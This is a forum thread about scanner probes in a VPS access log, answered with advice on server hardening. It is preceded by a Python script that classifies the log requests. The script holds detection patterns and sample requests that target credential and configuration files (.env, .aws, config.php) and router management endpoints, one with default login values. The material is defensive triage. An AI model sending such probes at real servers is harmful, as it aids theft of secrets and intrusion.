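An added triage example, not part of any forum post: it sorts access-log requests of the kinds seen in the log above into scanner categories and lists any probe the server answered with a 2xx status instead of 400/404/405. The category names and patterns are this example's own assumptions, and the last sample line is constructed (documentation address 203.0.113.7) to show the case that needs follow-up.

```python
import re
from collections import Counter

# Apache combined log: ip ident user [time] "request" status size ...
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<req>(?:[^"\\]|\\.)*)" (?P<status>\d{3}) \S+'
)

# First matching rule wins. Labels and patterns are this example's own,
# derived from the request shapes visible in the log above.
RULES = [
    # TLS record header (0x16 handshake, 0x03 major version) sent to the
    # plain-HTTP port: Apache logs the raw bytes escaped and answers 400.
    ("tls_on_plain_http", re.compile(r'^\\x16\\x03')),
    # CONNECT or absolute-URI requests test whether the server is an open proxy.
    ("proxy_abuse", re.compile(r'^(?:CONNECT \S+|[A-Z]+ https?://)')),
    # Management endpoints of routers, appliances and frameworks.
    ("device_exploit_probe", re.compile(
        r'^[A-Z]+ /(?:boaform/|setup\.cgi|mgmt/tm/util/bash|actuator/)')),
    # Guessing at files that tend to hold credentials or configuration.
    ("secret_file_probe", re.compile(
        r'^[A-Z]+ \S*(?:/\.(?:env|aws)\b'
        r'|/(?:phpinfo(?:\.php)?|info\.php)(?=[?\s])'
        r'|/(?:config|configuration|conf|settings)\.(?:php|json)(?=[?\s])'
        r'|\.cfg(?=[?\s]))')),
]
WELL_FORMED = re.compile(r'^[A-Z]+ \S+ HTTP/\d\.\d$')


def classify(request):
    """Return the category label for one logged request line."""
    for label, pattern in RULES:
        if pattern.search(request):
            return label
    return "ordinary" if WELL_FORMED.match(request) else "malformed"


def triage(lines):
    """Count requests per category and collect probes answered with 2xx."""
    counts, answered = Counter(), []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            counts["unparsed"] += 1
            continue
        label = classify(m["req"])
        counts[label] += 1
        status = int(m["status"])
        # A probe that got real content back is the one worth investigating.
        if label != "ordinary" and 200 <= status < 300:
            answered.append((m["ip"], m["req"], status))
    return counts, answered


# Lines copied from the log quoted in the question.
PAGE_LINES = r'''
138.99.216.228 - - [05/Jul/2022:04:07:06 +0200] "\x16\x03\x02\x01o\x01" 400 226 "-" "-"
192.241.222.172 - - [05/Jul/2022:05:13:30 +0200] "MGLNDD_51.195.90.75_443\n" 400 226 "-" "-"
222.186.19.205 - - [05/Jul/2022:05:53:57 +0200] "CONNECT zz.bdstatic.com:443 HTTP/1.1" 405 224 "-" "Go-http-client/1.1"
202.164.136.28 - - [05/Jul/2022:07:06:09 +0200] "GET /boaform/admin/formLogin?username=adminisp&psd=adminisp HTTP/1.0" 404 196 "-" "-"
20.239.52.159 - - [06/Jul/2022:03:19:54 +0200] "GET /.env.save HTTP/1.1" 404 196 "-" "python-requests/2.28.1"
132.145.9.189 - - [06/Jul/2022:06:31:50 +0200] "GET /config.php HTTP/1.1" 404 196 "-" "-"
132.145.9.189 - - [06/Jul/2022:06:31:50 +0200] "GET /phpinfo.php HTTP/1.1" 404 196 "-" "-"
80.94.93.43 - - [06/Jul/2022:09:33:29 +0200] "GET / HTTP/1.1" 302 213 "-" "libwww-perl/6.67"
'''.strip().splitlines()

# Constructed line (not from the page): the same probe, but answered with 200.
CONSTRUCTED = [
    '203.0.113.7 - - [06/Jul/2022:10:00:00 +0200] "GET /.env HTTP/1.1" 200 512 "-" "-"',
]

if __name__ == "__main__":
    counts, answered = triage(PAGE_LINES + CONSTRUCTED)
    for label, n in counts.most_common():
        print(f"{n:3d}  {label}")
    for ip, req, status in answered:
        print(f"ANSWERED {status}: {ip} {req}")
```

Run against the full log, an empty "answered" list means every probe was refused, which matches the 400/404/405 statuses in the entries quoted in the question.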
0
katakrowa wrote:
  1. What kind of site was it? On which framework? Some of the entries look like a primitive attack aimed at extracting configuration files. Old or unpatched frameworks are vulnerable to such attacks.
  2. Did you secure the server yourself?
  1. Are these attacks very dangerous? Are they some kind of bots? The framework I have is Laravel Framework 8.63.0, but on another subdomain there was a plain HTML page and it didn't work there either.
  2. I didn't secure the server; I think there was only protection on the OVH side (VPS server).
0

I didn't secure the server; I think there was only protection on the OVH side (VPS server).

Well, if you have a VPS, securing it is definitely on your side: firewall rules, regular patching and updating of services, restricting access to some services to selected addresses (or e.g. through a VPN), SSH login with a certificate/key, changing the ports of some services, enabling event logging, blocking root access, changing default logins and passwords, disabling unnecessary services, and so on.

On the hosting provider's side you may only have backups of the VM and some protection against DoS attacks. But everything else is your problem.

0
cerrato wrote:

I didn't secure the server; I think there was only protection on the OVH side (VPS server).

Well, if you have a VPS, securing it is definitely on your side: firewall rules, regular patching and updating of services, restricting access to some services to selected addresses (or e.g. through a VPN), SSH login with a certificate/key, changing the ports of some services, enabling event logging, blocking root access, changing default logins and passwords, disabling unnecessary services, and so on.

On the hosting provider's side you may only have backups of the VM and some protection against DoS attacks. But everything else is your problem.

Do I understand correctly that you get more protection with a VPS than with hosting?

0

Hosting and a VPS are two completely different things.

When you buy hosting you get a ready-made service, most often a web and mail server managed by the provider. All the updates, configuration tuning, securing of services and so on are on their side, and you simply get a place where, once you upload your files, they will be served to the whole world.

A VPS, on the other hand, is simply a server: a whole machine (a virtual one, admittedly, but that doesn't matter). It's a bit as if you took a computer, installed a system on it and plugged it with a cable into a modem/router, so that the whole world can reach your server. And now it depends only on you what will be running on that machine, how you secure it, whether the services and the system get updated, and so on.

The fact that the VPS sits in some data center is just a matter of logistics; formally speaking, you can consider it a little computer standing in your bedroom with a cable going out into the world. What you do with it is your problem; the hosting provider is not responsible for anything (other than making sure the machine runs stably and without interruptions and has the declared resources such as RAM or vCPU).
